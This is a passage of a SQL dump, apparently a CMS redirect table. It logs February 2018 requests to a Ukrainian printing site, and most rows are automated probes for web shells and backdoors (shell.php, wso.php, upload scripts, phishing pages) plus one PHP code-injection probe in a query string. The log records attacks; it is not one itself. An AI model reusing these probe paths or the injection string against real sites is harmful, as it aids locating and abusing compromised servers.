14:02:25','0000-00-00 00:00:00',301),(12522,'http://ekvatorprint.com.ua/Plss.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:08:38','0000-00-00 00:00:00',301),(12523,'http://ekvatorprint.com.ua/components/com_media/string.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:56:09','0000-00-00 00:00:00',301),(12524,'http://ekvatorprint.com.ua/plugins/editors/jckeditor/jckeditor/plugins/templates/dialogs/pube.php',NULL,'http://site.ru','',2,0,'2018-02-01 14:56:31','0000-00-00 00:00:00',301),(12525,'http://ekvatorprint.com.ua/wp-includes/admin_login.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:58:57','0000-00-00 00:00:00',301),(12526,'http://ekvatorprint.com.ua/1/administrator/components/com_newsfeeds/views/newsfeeds/sql-ou.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:46:50','0000-00-00 00:00:00',301),(12527,'http://ekvatorprint.com.ua/administrator/components/com_messages/views/lomnw.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:51:04','0000-00-00 00:00:00',301),(12528,'http://ekvatorprint.com.ua/components/com_phocagallery/views/info/tmpl/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:51:46','0000-00-00 00:00:00',301),(12529,'http://ekvatorprint.com.ua/components/com_virtuemart/themes/default/templates/browse/sql-ou.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:54:43','0000-00-00 00:00:00',301),(12530,'http://ekvatorprint.com.ua/language/en-GB/bahvimq.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:54:52','0000-00-00 00:00:00',301),(12531,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.4/omB.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:55:48','0000-00-00 00:00:00',301),(12532,'http://ekvatorprint.com.ua/components/com_comprofiler/plugin/templates/plmrmb.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:55:49','0000-00-00 00:00:00',301),(12533,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/paste/js/ojkgh.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:57:07','0000-00-00 00:00:00',301),(12534,'http://ekvatorprint.com.ua/includes/classp6.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:57:10','0000-00-00 00:00:00',301),(12535,'http://ekvatorprint.com.ua/components/fabwjf.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:57:12','0000-00-00 00:00:00',301),(12536,'http://ekvatorprint.com.ua/tounsicoke.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:58:48','0000-00-00 00:00:00',301),(12537,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/sky.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:00:31','0000-00-00 00:00:00',301),(12538,'http://ekvatorprint.com.ua/templates/beez3/html/com_contact/contact/update.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:12:57','0000-00-00 00:00:00',301),(12539,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/client/lomnw.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:47:21','0000-00-00 00:00:00',301),(12540,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_redirect/Dnewv.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:49:22','0000-00-00 00:00:00',301),(12541,'http://ekvatorprint.com.ua/administrator/components/com_virtuemart/classes/payment/debug.php',NULL,'http://site.ru','',2,0,'2018-02-01 16:49:37','0000-00-00 00:00:00',301),(12542,'http://ekvatorprint.com.ua/libraries/mo.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:50:49','0000-00-00 00:00:00',301),(12543,'http://ekvatorprint.com.ua/tmp/install_59c2b23c0a14e/packages/install_59c2b23ea3efc/administrator/dieace.php',NULL,'http://site.ru','',19,0,'2018-02-01 16:51:45','0000-00-00 00:00:00',301),(12544,'http://ekvatorprint.com.ua/layouts/hdovr.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:51:46','0000-00-00 00:00:00',301),(12545,'http://ekvatorprint.com.ua/templates/blue-lotus/html/com_search/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:51:52','0000-00-00 00:00:00',301),(12546,'http://ekvatorprint.com.ua/plugins/editors/jckeditor/skins/office2007/images/Dwsonv.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:55:00','0000-00-00 00:00:00',301),(12547,'http://ekvatorprint.com.ua/xcontact182.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:55:46','0000-00-00 00:00:00',301),(12548,'http://ekvatorprint.com.ua/administrator/components/com_languages/models/forms/plmrmb.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:36:49','0000-00-00 00:00:00',301),(12549,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/maps/tmpl/404.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:44:42','0000-00-00 00:00:00',301),(12550,'http://ekvatorprint.com.ua/modules/mod_tzk2_new/tmpl/BoxTwo/sky.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:49:14','0000-00-00 00:00:00',301),(12551,'http://ekvatorprint.com.ua/plugins/editors/jce/tiny_mce/plugins/searchreplace/img/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:49:56','0000-00-00 00:00:00',301),(12552,'http://ekvatorprint.com.ua/joomla/components/com_search/views/search/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:51:47','0000-00-00 00:00:00',301),(12553,'http://ekvatorprint.com.ua/star/administrator/templates/hathor/html/com_messages/messages/pouimeq.php',NULL,'http://site.ru','',2,0,'2018-02-01 18:39:01','0000-00-00 00:00:00',301),(12554,'http://ekvatorprint.com.ua/editor/zlrzvnb.php',NULL,'http://site.ru','',1,0,'2018-02-01 18:39:27','0000-00-00 00:00:00',301),(12555,'http://ekvatorprint.com.ua/plugins/editors/jckeditor/jckeditor/plugins/jfilebrowser/images/icons/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 18:41:49','0000-00-00 00:00:00',301),(12556,'http://ekvatorprint.com.ua/templates/default/img/carousel/lomnw.php',NULL,'http://site.ru','',1,0,'2018-02-01 18:42:09','0000-00-00 00:00:00',301),(12557,'http://ekvatorprint.com.ua/plugins/content/sigplus/engines/slimbox2/js/sql-ou.php',NULL,'http://site.ru','',2,0,'2018-02-01 19:04:27','0000-00-00 00:00:00',301),(12558,'http://ekvatorprint.com.ua/tmp/com_virtuemart_allinone_update/admin/plugins/vmpayment/heidelpay/Dwsonv.php',NULL,'http://site.ru','',1,0,'2018-02-01 19:38:57','0000-00-00 00:00:00',301),(12559,'http://ekvatorprint.com.ua/components/com_content/ead2sz.php',NULL,'http://site.ru','',1,0,'2018-02-01 20:28:53','0000-00-00 00:00:00',301),(12560,'http://ekvatorprint.com.ua/administrator/components/com_installer/controllers/Dwsonv.php',NULL,'http://site.ru','',1,0,'2018-02-01 20:30:52','0000-00-00 00:00:00',301),(12561,'http://ekvatorprint.com.ua/images/stories/index_backup.php',NULL,'http://site.ru','',1,0,'2018-02-01 20:31:26','0000-00-00 00:00:00',301),(12562,'http://ekvatorprint.com.ua/libraries/cms/html/slbut.php',NULL,'http://site.ru','',2,0,'2018-02-01 20:31:29','0000-00-00 00:00:00',301),(12563,'http://ekvatorprint.com.ua/IQ4Age.php',NULL,'http://site.ru','',1,0,'2018-02-01 20:31:35','0000-00-00 00:00:00',301),(12564,'http://ekvatorprint.com.ua/log/logs/error.php',NULL,'http://site.ru','',2,0,'2018-02-01 21:22:12','0000-00-00 00:00:00',301),(12565,'http://ekvatorprint.com.ua/plugins/xmlrpc/avvli.php',NULL,'http://site.ru','',2,0,'2018-02-01 21:23:26','0000-00-00 00:00:00',301),(12566,'http://ekvatorprint.com.ua/language/en-GB/bctsd.php',NULL,'http://site.ru','',2,0,'2018-02-01 21:24:13','0000-00-00 00:00:00',301),(12567,'http://ekvatorprint.com.ua/includes/domit/xmlrpz.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:27:26','0000-00-00 00:00:00',301),(12568,'http://ekvatorprint.com.ua/administrator/components/com_plugins/mlkeha.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:27:50','0000-00-00 00:00:00',301),(12569,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/code/lomnw.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:33:39','0000-00-00 00:00:00',301),(12570,'http://ekvatorprint.com.ua/plugins/editors-xtd/ws_shortcodebutton/helper/images/plmrmb.php',NULL,'http://site.ru','',9,0,'2018-02-01 21:39:45','0000-00-00 00:00:00',301),(12571,'http://ekvatorprint.com.ua/administrator/components/com_finder/sql/debug.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:13:31','0000-00-00 00:00:00',301),(12572,'http://ekvatorprint.com.ua/libraries/pattemplate/sffsr.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:16:23','0000-00-00 00:00:00',301),(12573,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/views/filter/plmrmb.php',NULL,'http://site.ru','',2,0,'2018-02-01 22:16:57','0000-00-00 00:00:00',301),(12574,'http://ekvatorprint.com.ua/administrator/components/com_users/models/plmrmb.php',NULL,'http://site.ru','',2,0,'2018-02-01 22:18:01','0000-00-00 00:00:00',301),(12575,'http://ekvatorprint.com.ua/components/com_content/views/categories/tmpl/ini.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:19:12','0000-00-00 00:00:00',301),(12576,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/media/langs/server-sql.php',NULL,'http://site.ru','',2,0,'2018-02-01 22:20:13','0000-00-00 00:00:00',301),(12577,'http://ekvatorprint.com.ua/administrator/components/com_users/views/mail/mbfg.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:07:37','0000-00-00 00:00:00',301),(12578,'http://ekvatorprint.com.ua/templates/system/images/green.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:09:04','0000-00-00 00:00:00',301),(12579,'http://ekvatorprint.com.ua/subzero/account-validation/File/file.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:09:47','0000-00-00 00:00:00',301),(12580,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_plugins/plugins/plmrmb.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:12:44','0000-00-00 00:00:00',301),(12581,'http://ekvatorprint.com.ua/microsoft1/account-validation/File/file.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:12:54','0000-00-00 00:00:00',301),(12582,'http://ekvatorprint.com.ua/modules/mod_breadcrumbs/lomnw.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:12:58','0000-00-00 00:00:00',301),(12583,'http://ekvatorprint.com.ua/modules/mod_workfromhome/mod_workfromhome.php',NULL,'http://site.ru','',4,0,'2018-02-01 23:15:15','0000-00-00 00:00:00',301),(12584,'http://ekvatorprint.com.ua/modules/mod_roknavmenu/themes/fusion/js/sky.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:16:18','0000-00-00 00:00:00',301),(12585,'http://ekvatorprint.com.ua/components/com_users/helpers/html/mhhrx.php',NULL,'http://site.ru','',3,0,'2018-02-01 23:18:37','0000-00-00 00:00:00',301),(12586,'http://ekvatorprint.com.ua/administrator/components/com_virtuemart/assets/images/admin_menu/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:31:47','0000-00-00 00:00:00',301),(12587,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/styles/tmpl/okkas.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:03:09','0000-00-00 00:00:00',301),(12588,'http://ekvatorprint.com.ua/forum/logo_img.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:04:21','0000-00-00 00:00:00',301),(12589,'http://ekvatorprint.com.ua/administrator/includes/kptun.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:05:25','0000-00-00 00:00:00',301),(12590,'http://ekvatorprint.com.ua/tmp/ckdbf.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:09:07','0000-00-00 00:00:00',301),(12591,'http://ekvatorprint.com.ua/templates/go_roundy/css/omquas.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:18:46','0000-00-00 00:00:00',301),(12592,'http://ekvatorprint.com.ua/Dwsonv.php',NULL,'http://site.ru','',2,0,'2018-02-02 00:56:47','0000-00-00 00:00:00',301),(12593,'http://ekvatorprint.com.ua/cli/lastupdate.php',NULL,'http://site.ru','',2,0,'2018-02-02 00:57:40','0000-00-00 00:00:00',301),(12594,'http://ekvatorprint.com.ua/templates/yoo_bigeasy/styles/blue/images/tools/plmrmb.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:59:37','0000-00-00 00:00:00',301),(12595,'http://ekvatorprint.com.ua/templates/plantillabaratey3/html/com_content/featured/connet.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:20:20','0000-00-00 00:00:00',301),(12596,'http://ekvatorprint.com.ua/administrator/components/com_ckforms/views/ckform/tmpl/sky.php',NULL,'http://site.ru','',2,0,'2018-02-02 01:49:49','0000-00-00 00:00:00',301),(12597,'http://ekvatorprint.com.ua/media/com_finder/js/wrkim.php',NULL,'http://site.ru','',2,0,'2018-02-02 01:50:45','0000-00-00 00:00:00',301),(12598,'http://ekvatorprint.com.ua/administrator/modules/mod_custom/tmpl/mntref.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:52:17','0000-00-00 00:00:00',301),(12599,'http://ekvatorprint.com.ua/administrator/modules/mod_custom/tmpl/mntref.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:52:17','0000-00-00 00:00:00',301),(12600,'http://ekvatorprint.com.ua/q3okr9.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:52:25','0000-00-00 00:00:00',301),(12601,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/tbisw.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:54:15','0000-00-00 00:00:00',301),(12602,'http://ekvatorprint.com.ua/imag/rxosrl.php',NULL,'http://site.ru','',2,0,'2018-02-02 01:55:35','0000-00-00 00:00:00',301),(12603,'http://ekvatorprint.com.ua/nova',NULL,'http://site.ru','',1,0,'2018-02-02 02:07:54','0000-00-00 00:00:00',301),(12604,'http://ekvatorprint.com.ua/kErwQh.php',NULL,'http://site.ru','',1,0,'2018-02-02 02:46:02','0000-00-00 00:00:00',301),(12605,'http://ekvatorprint.com.ua/components/qedjmy.php',NULL,'http://site.ru','',1,0,'2018-02-02 02:48:56','0000-00-00 00:00:00',301),(12606,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_users/groups/pouimeq.php',NULL,'http://site.ru','',1,0,'2018-02-02 02:50:07','0000-00-00 00:00:00',301),(12607,'http://ekvatorprint.com.ua/administrator/components/com_content/models/forms/wjeirsw.php',NULL,'http://site.ru','',1,0,'2018-02-02 02:55:33','0000-00-00 00:00:00',301),(12608,'http://ekvatorprint.com.ua/modules/mod_poll/tmpl/my.php',NULL,'http://site.ru','',3,0,'2018-02-02 03:02:41','0000-00-00 00:00:00',301),(12609,'http://ekvatorprint.com.ua/tmp/com_virtuemart_update/components/com_virtuemart/views/cart/dceal.php',NULL,'http://site.ru','',2,0,'2018-02-02 03:35:29','0000-00-00 00:00:00',301),(12610,'http://ekvatorprint.com.ua/administrator/components/com_messages/wspmyep.php',NULL,'http://site.ru','',1,0,'2018-02-02 03:41:57','0000-00-00 00:00:00',301),(12611,'http://ekvatorprint.com.ua/images/stories/..wil!.php',NULL,'http://site.ru','',1,0,'2018-02-02 03:46:46','0000-00-00 00:00:00',301),(12612,'http://ekvatorprint.com.ua/components/com_content/views/section/tmpl/desua.php',NULL,'http://site.ru','',2,0,'2018-02-02 03:50:55','0000-00-00 00:00:00',301),(12613,'http://ekvatorprint.com.ua/wp-content/plugins/nav-menus.php',NULL,'http://site.ru','',2,0,'2018-02-02 03:52:01','0000-00-00 00:00:00',301),(12614,'http://ekvatorprint.com.ua/media/shell.php',NULL,'http://site.ru','',1,0,'2018-02-02 04:22:31','0000-00-00 00:00:00',301),(12615,'http://ekvatorprint.com.ua/images/ylkdjl.php',NULL,'http://site.ru','',2,0,'2018-02-02 04:29:15','0000-00-00 00:00:00',301),(12616,'http://ekvatorprint.com.ua/language/shell.php',NULL,'http://site.ru','',2,0,'2018-02-02 04:35:05','0000-00-00 00:00:00',301),(12617,'http://ekvatorprint.com.ua/libraries/simplepie/idn/kuxel.php',NULL,'http://site.ru','',1,0,'2018-02-02 04:38:05','0000-00-00 00:00:00',301),(12618,'http://ekvatorprint.com.ua/templates/default/language/sql-on.php',NULL,'http://site.ru','',1,0,'2018-02-02 05:23:48','0000-00-00 00:00:00',301),(12619,'http://ekvatorprint.com.ua/templates/yoo_square/images/widgetkit/white/pafycx.php',NULL,'http://site.ru','',1,0,'2018-02-02 05:58:23','0000-00-00 00:00:00',301),(12620,'http://ekvatorprint.com.ua/tmp/install_4ffcb135841c9/lt-LT/dqrro.php',NULL,'http://site.ru','',3,0,'2018-02-02 05:59:04','0000-00-00 00:00:00',301),(12621,'http://ekvatorprint.com.ua/administrator/components/com_admin/tmpl/hgpev.php',NULL,'http://site.ru','',1,0,'2018-02-02 06:05:09','0000-00-00 00:00:00',301),(12622,'http://ekvatorprint.com.ua/administrator/components/com_newsfeeds/views/mjfds.php',NULL,'http://site.ru','',2,0,'2018-02-02 06:12:03','0000-00-00 00:00:00',301),(12623,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_installer/update/pouimeq.php',NULL,'http://site.ru','',1,0,'2018-02-02 06:50:50','0000-00-00 00:00:00',301),(12624,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.4/kv.php',NULL,'http://site.ru','',3,0,'2018-02-02 06:54:20','0000-00-00 00:00:00',301),(12625,'http://ekvatorprint.com.ua/includes/account-validation/File/file.php',NULL,'http://site.ru','',2,0,'2018-02-02 06:56:36','0000-00-00 00:00:00',301),(12626,'http://ekvatorprint.com.ua/administrator/components/com_contact/helpers/html/lomnw.php',NULL,'http://site.ru','',1,0,'2018-02-02 07:07:43','0000-00-00 00:00:00',301),(12627,'http://ekvatorprint.com.ua/cli/dawhk.php',NULL,'http://site.ru','',1,0,'2018-02-02 07:17:09','0000-00-00 00:00:00',301),(12628,'http://ekvatorprint.com.ua/libraries/joomla/filesystem/meta/language/config.php',NULL,'http://site.ru','',2,0,'2018-02-03 11:37:59','0000-00-00 00:00:00',301),(12629,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/contextmenu/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 11:39:58','0000-00-00 00:00:00',301),(12630,'http://ekvatorprint.com.ua/images/log.php',NULL,'http://site.ru','',2,0,'2018-02-03 11:41:12','0000-00-00 00:00:00',301),(12631,'http://ekvatorprint.com.ua/components/com_poll/views/poll/tmpl/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 13:16:14','0000-00-00 00:00:00',301),(12632,'http://ekvatorprint.com.ua/templates/ja_purity/styles/elements/red/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 13:27:07','0000-00-00 00:00:00',301),(12633,'http://ekvatorprint.com.ua/components/com_mailto/views/sent/tmpl/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 14:15:56','0000-00-00 00:00:00',301),(12634,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/download/config.php',NULL,'http://site.ru','',1,0,'2018-02-03 15:30:41','0000-00-00 00:00:00',301),(12635,'http://ekvatorprint.com.ua/img/checked.png',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',16,0,'2018-02-03 16:17:58','0000-00-00 00:00:00',301),(12636,'http://ekvatorprint.com.ua/components/com_wrapper/views/wrapper/tmpl/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 16:18:43','0000-00-00 00:00:00',301),(12637,'http://ekvatorprint.com.ua/components/com_contact/models/models.php',NULL,'http://site.ru','',2,0,'2018-02-03 17:20:40','0000-00-00 00:00:00',301),(12638,'http://ekvatorprint.com.ua/templates/atomic/kd.php',NULL,'http://site.ru','',1,0,'2018-02-03 17:21:15','0000-00-00 00:00:00',301),(12639,'http://ekvatorprint.com.ua/templates/atomic/kd.php',NULL,'http://site.ru','',1,0,'2018-02-03 17:21:15','0000-00-00 00:00:00',301),(12640,'http://ekvatorprint.com.ua/plugins/user/user.php',NULL,'http://site.ru','',2,0,'2018-02-03 17:21:54','0000-00-00 00:00:00',301),(12641,'http://ekvatorprint.com.ua/administrator/components/com_modules/views/module/config.php',NULL,'http://site.ru','',1,0,'2018-02-03 18:21:42','0000-00-00 00:00:00',301),(12642,'http://ekvatorprint.com.ua/libraries/joomla/document/html/renderer/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 18:21:44','0000-00-00 00:00:00',301),(12643,'http://ekvatorprint.com.ua/templates/beez/html/com_content/article/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 18:22:14','0000-00-00 00:00:00',301),(12644,'http://ekvatorprint.com.ua/components/com_contact/views/categories/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-03 19:23:51','0000-00-00 00:00:00',301),(12645,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/directionality/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 20:23:16','0000-00-00 00:00:00',301),(12646,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/content-post.php',NULL,'http://site.ru','',1,0,'2018-02-03 22:11:09','0000-00-00 00:00:00',301),(12647,'http://ekvatorprint.com.ua/templates/beez/html/com_content/article/conflg.php',NULL,'http://site.ru','',1,0,'2018-02-03 22:14:12','0000-00-00 00:00:00',301),(12648,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/style/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 22:19:20','0000-00-00 00:00:00',301),(12649,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 22:21:34','0000-00-00 00:00:00',301),(12650,'http://ekvatorprint.com.ua/components/com_user/views/register/tmpl/conflg.php',NULL,'http://site.ru','',1,0,'2018-02-03 22:33:00','0000-00-00 00:00:00',301),(12651,'http://ekvatorprint.com.ua/components/com_search/models/models.php',NULL,'http://site.ru','',2,0,'2018-02-03 23:12:59','0000-00-00 00:00:00',301),(12652,'http://ekvatorprint.com.ua/templates/beez/html/com_poll/poll/conflg.php',NULL,'http://site.ru','',2,0,'2018-02-04 00:13:15','0000-00-00 00:00:00',301),(12653,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/install/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 06:56:42','0000-00-00 00:00:00',301),(12654,'http://ekvatorprint.com.ua/modules/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-04 07:04:01','0000-00-00 00:00:00',301),(12655,'http://ekvatorprint.com.ua/language/system.php',NULL,'http://site.ru','',2,0,'2018-02-04 07:05:47','0000-00-00 00:00:00',301),(12656,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/preview/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 07:06:41','0000-00-00 00:00:00',301),(12657,'http://ekvatorprint.com.ua/cache/ini.php',NULL,'http://site.ru','',1,0,'2018-02-04 08:48:02','0000-00-00 00:00:00',301),(12658,'http://ekvatorprint.com.ua/templates/beez/html/com_content/section/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 10:28:59','0000-00-00 00:00:00',301),(12659,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/templates/conflg.php',NULL,'http://site.ru','',2,0,'2018-02-04 10:39:19','0000-00-00 00:00:00',301),(12660,'http://ekvatorprint.com.ua/administrator/components/com_menus/assets/images/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-04 11:14:38','0000-00-00 00:00:00',301),(12661,'http://ekvatorprint.com.ua/install/models.php',NULL,'http://site.ru','',1,0,'2018-02-04 12:02:38','0000-00-00 00:00:00',301),(12662,'http://ekvatorprint.com.ua/home.php',NULL,'http://site.ru','',1,0,'2018-02-04 13:08:33','0000-00-00 00:00:00',301),(12663,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advimage/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-04 13:17:32','0000-00-00 00:00:00',301),(12664,'http://ekvatorprint.com.ua/administrator/templates/khepri/images/toolbar/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 16:07:59','0000-00-00 00:00:00',301),(12665,'http://ekvatorprint.com.ua/wp-content/themes/atom/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/atom/style.css','',2,0,'2018-02-05 06:01:12','0000-00-00 00:00:00',301),(12666,'http://ekvatorprint.com.ua/administrator/help/uploader.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-02-05 07:39:12','0000-00-00 00:00:00',301),(12667,'http://ekvatorprint.com.ua/libraries/phputf8/phputf.php?wphp4=true',NULL,'ekvatorprint.com.ua','',1,0,'2018-02-05 08:07:47','0000-00-00 00:00:00',301),(12668,'http://ekvatorprint.com.ua/inlos.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-02-05 12:43:30','0000-00-00 00:00:00',301),(12669,'http://ekvatorprint.com.ua/cache/iph.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-02-05 12:46:26','0000-00-00 00:00:00',301),(12670,'http://ekvatorprint.com.ua/sph.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-02-05 12:51:55','0000-00-00 00:00:00',301),(12671,'http://ekvatorprint.com.ua/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-07 02:05:19','0000-00-00 00:00:00',301),(12672,'http://ekvatorprint.com.ua/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-07 02:05:19','0000-00-00 00:00:00',301),(12673,'http://ekvatorprint.com.ua/downloader/',NULL,'','',6,0,'2018-02-07 12:50:37','0000-00-00 00:00:00',301),(12674,'http://ekvatorprint.com.ua/.index.php?xo=echo(base64_decode(\'dGVzdA==\'));',NULL,'','',2,0,'2018-02-08 00:23:25','0000-00-00 00:00:00',301),(12675,'http://ekvatorprint.com.ua/plugins/content/apismtp/ini.php',NULL,'http://site.ru','',2,0,'2018-02-08 07:24:57','0000-00-00 00:00:00',301),(12676,'http://ekvatorprint.com.ua/libraries/idna_convert/mod.php',NULL,'http://site.ru','',1,0,'2018-02-08 07:28:00','0000-00-00 00:00:00',301),(12677,'http://ekvatorprint.com.ua/sitemap.ashx',NULL,'http://ekvatorprint.com.ua/sitemap.txt','',18,0,'2018-02-08 07:52:35','0000-00-00 00:00:00',301),(12678,'http://ekvatorprint.com.ua/modules/mod_login/log.php.php',NULL,'http://site.ru','',1,0,'2018-02-08 08:10:09','0000-00-00 00:00:00',301),(12679,'http://ekvatorprint.com.ua/administrator/components/com_admin/controllers/theme.php',NULL,'http://site.ru','',2,0,'2018-02-08 08:14:41','0000-00-00 00:00:00',301),(12680,'http://ekvatorprint.com.ua/plugins/authentication/gmail/advanced_settings.php',NULL,'http://site.ru','',2,0,'2018-02-08 08:15:44','0000-00-00 00:00:00',301),(12681,'http://ekvatorprint.com.ua/components/com_foxcontact/wso.php',NULL,'http://site.ru','',2,0,'2018-02-08 09:00:01','0000-00-00 00:00:00',301),(12682,'http://ekvatorprint.com.ua/modules/mod_stats/tmpl/wso2.php',NULL,'http://site.ru','',2,0,'2018-02-08 09:00:17','0000-00-00 00:00:00',301),(12683,'http://ekvatorprint.com.ua/index8632.php',NULL,'http://site.ru','',2,0,'2018-02-08 09:02:26','0000-00-00 00:00:00',301),(12684,'http://ekvatorprint.com.ua/j15/administrator/components/com_weblinks/sql-omn.php',NULL,'http://site.ru','',1,0,'2018-02-08 09:16:16','0000-00-00 00:00:00',301),(12685,'http://ekvatorprint.com.ua/administrator/log.php.php',NULL,'http://site.ru','',1,0,'2018-02-08 09:48:55','0000-00-00 00:00:00',301),(12686,'http://ekvatorprint.com.ua/modules/mod_articles_tags/tmpl/mide.php',NULL,'http://site.ru','',1,0,'2018-02-08 10:35:34','0000-00-00 00:00:00',301),(12687,'http://ekvatorprint.com.ua/ass.php',NULL,'http://site.ru','',1,0,'2018-02-08 10:44:57','0000-00-00 00:00:00',301),(12688,'http://ekvatorprint.com.ua/administrator/components/com_xmap/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_xmap/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-08 10:55:01','0000-00-00 00:00:00',301),(12689,'http://ekvatorprint.com.ua/v3.php',NULL,'http://site.ru','',3,0,'2018-02-08 11:23:07','0000-00-00 00:00:00',301),(12690,'http://ekvatorprint.com.ua/mary.php',NULL,'http://site.ru','',2,0,'2018-02-08 11:23:43','0000-00-00 00:00:00',301),(12691,'http://ekvatorprint.com.ua/libraries/joomla/template/mide.php',NULL,'http://site.ru','',1,0,'2018-02-08 11:26:35','0000-00-00 00:00:00',301),(12692,'http://ekvatorprint.com.ua/s.php',NULL,'http://site.ru','',2,0,'2018-02-08 12:02:57','0000-00-00 00:00:00',301),(12693,'http://ekvatorprint.com.ua/plugins/editors/css.php',NULL,'http://site.ru','',1,0,'2018-02-08 12:59:30','0000-00-00 